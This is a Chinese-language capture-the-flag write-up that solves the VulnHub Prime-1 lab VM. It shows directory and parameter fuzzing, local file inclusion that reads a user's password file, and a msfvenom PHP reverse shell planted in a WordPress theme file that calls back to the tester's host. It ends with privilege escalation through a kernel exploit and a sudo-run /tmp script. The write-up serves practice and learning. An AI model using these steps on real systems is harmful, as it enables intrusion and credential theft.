本篇文章僅用於技術交流學習和研究的目的，嚴禁使用文章中的技術用於非法目的和破壞，否則造成一切後果與發表本文章的作者無關

靶機下載之後使用僅主機模式載入到本地VMware Workstation工作站，需要發現目標靶機的IP地址，可以使用nmap，netdiscover，或者arp之類的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 當然也是可以使用Windows環境下mac地址掃描工具都是可以的，那麼本次演示就是arp-scan工具發現

地址:https://www.vulnhub.com/entry/prime-1,358/

nmap掃描結果

只開了兩個埠，22和80埠，直接訪問80埠看看

沒發現什麼有價值的資訊，使用dirb進行爆破目錄看看

發現了3類有用的地址，分別是 dev ， index.php ， wordpress ；分別訪問其頁面看看

這裡提示要再次進行目錄爆破深入挖掘，先放著，看兩個

確認訪問 http://192.168.56.111/index.php和不帶index.php訪問是一樣的

WordPress頁面如上

到了這一步，那我們根據上面3個線索向後找，第一個是提示需要深挖目標靶機的目錄，那麼我再次嘗試使用dirb命令指定副檔名進行挖掘試試看看

dirb http://192.168.56.111 -X .txt,.php,.html,.zip

發現如下3個URI地址，其中一個index.php跟上面探測重複了，先訪問下secret.txt 看看

發現了重要資訊，那麼繼續跟著這個線索向後操作，這裡也說明下，當線索很多的時候，一個一個的來，當其中一個線索斷了，再試另一個；根據上面提示像是要使用wfuzz進行模糊測試

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.56.111/index.php?FUZZ=shit

仔細從上至下看了下，顯示了太多資訊其中有一個不一樣的，為了方便檢視反饋，我再次fuzz看看，這次新增一個過濾引數

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404
 
 --hw 12 http://192.168.56.111/index.php?FUZZ=shit

根據上述資訊可以確認存在引數file 訪問看看http://192.168.56.111/index.php?file

沒看到什麼東西，看到此類URL，嘗試下LFI看看，根據上面的提示有個檔案location.txt 訪問：http://192.168.56.111/index.php?file=location.txt

得到如上提示，意思是使用另一個php檔案帶入此引數訪問看看

檢視下此頁面的原始碼

得知有個密碼檔案password.txt 在目錄/home/saket下面，直接LFI讀檔案http://192.168.56.111/image.php?secrettier360=/home/saket/password.txt

得到密碼：follow_the_ippsec

使用此密碼嘗試ssh使用者saket和victor，都沒有成功，那麼試試是不是WordPress使用者victor的密碼，判斷目標靶機WordPress是否存在使用者victor有兩個依據，一個是目標靶機的web上有對應使用者寫的文章，另一個就是通過wpscan進行掃描探測出來的，發現過程如下

wpscan --url http://192.168.56.111/wordpress -e

通過訪問WordPress的預設後臺路徑輸入對應的賬號和密碼，真的成功登陸了，在裡面蒐羅一下，根據經驗正常情況下主題裡面的php檔案直接修改程式碼為一句話就可以拿shell，但是這裡找了好久就發現了檔案secret.php可以修改並更新的，那麼這裡使用metasploit進行利用，通過msfvenom直接生成一個php反彈shell程式碼更新到目標檔案secret.php然後配置好metasploit訪問secret.php即可拿shell了，具體過程如下：

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.101 lport=8833 -f raw -o bmfx.php

將上述生成的程式碼直接更新到secret.php檔案中，如下：

配置好metasploit，訪問http://192.168.56.111/wordpress/wp-content/themes/twentynineteen/secret.php 成功反彈shell

開始提權，這裡先使用核心本地提權

我更改lhost為192.168.56.101，此IP地址跟靶機互通

成功提權，拿到root許可權，獲得root.txt

再提一下，這裡也可有不使用metasploit進行提權，可以通過kali搜尋對應的核心漏洞C程式碼然後編譯生成可執行的exp傳至目標靶機進行提權

============================================================================================================================================================================================================

另一種提權方式：

通過上面metasploit獲得的普通許可權，切換到shell環境下，變成友好的shell環境之後檢視sudo資訊，發現saket使用者下的enc檔案是可以通過sudo以root方式執行

執行了一下檔案enc，發現需要密碼，於是在靶機上搜羅了一把，找到密碼

執行了一下然後輸入密碼，發現報錯沒許可權，想到上面的sudo資訊，剛好此處可以sudo執行

生成了兩個檔案一個是key.txt 另一個是enc.txt ,資訊如上所示，根據提示是要講ippsec加密成md5然後當做私鑰去解密enc.txt的內容，這裡需要用到兩個網站：https://www.cmd5.com/hash.aspx和https://www.devglan.com/online-tools/aes-encryption-decryption

最終操作過程如下：

最終的解密後的base64編碼資訊我丟到burpsuite上檢視如下：

得到使用者：saket 密碼：tribute_to_ippsec ，在當前shell環境下直接su切換過去，切換過去之後再次執行sudo -l看看是否可以提權

使用sudo的方式執行了上面提示的資訊

發現報錯顯示/tmp/challenge沒有找到，我到該目錄下看了下，發現並沒有此檔案，那麼可以通過新建此檔案，然後寫入/bin/bash進行提權

echo '#!/bin/bash' > challenge
echo "/bin/bash" >> challenge
chmod +x challenge

上面都操作好了，直接開始提權